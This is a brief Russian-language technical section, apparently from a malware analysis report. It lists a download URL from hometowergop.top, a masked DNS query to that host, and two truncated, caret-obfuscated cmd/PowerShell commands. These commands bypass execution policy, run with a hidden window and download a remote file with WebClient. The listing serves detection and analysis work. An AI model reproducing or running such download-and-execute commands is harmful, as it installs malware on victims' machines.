Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oW^e^R^she^ll.e^X^E ^-e^xEcUt^ionPOl^ICy^ ^By^PasS -n^o^pr^of^I^Le^ -wI^ndOws^Ty^L^E^ hi^Dd^en (Ne^w^-^o^bJ^e^ct^ sYSt^E^m.^n^e^t.^WEBc^l^i^Ent).^doW^N^Lo^aD^fi^LE^(^'h...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "p^oW^e^R^she^ll.e^X^E ^-e^xEcUt^ionPOl^ICy^ ^By^PasS -n^o^pr^of^I^Le^ -wI^ndOws^Ty^L^E^ hi^Dd^en (Ne^w^-^o^bJ^e^ct^ sYSt^E^m.^n^e^t.^WEBc^l^i^Ent).^doW^N^Lo^aD^fi^LE^(^'h...' (со скрытым окном)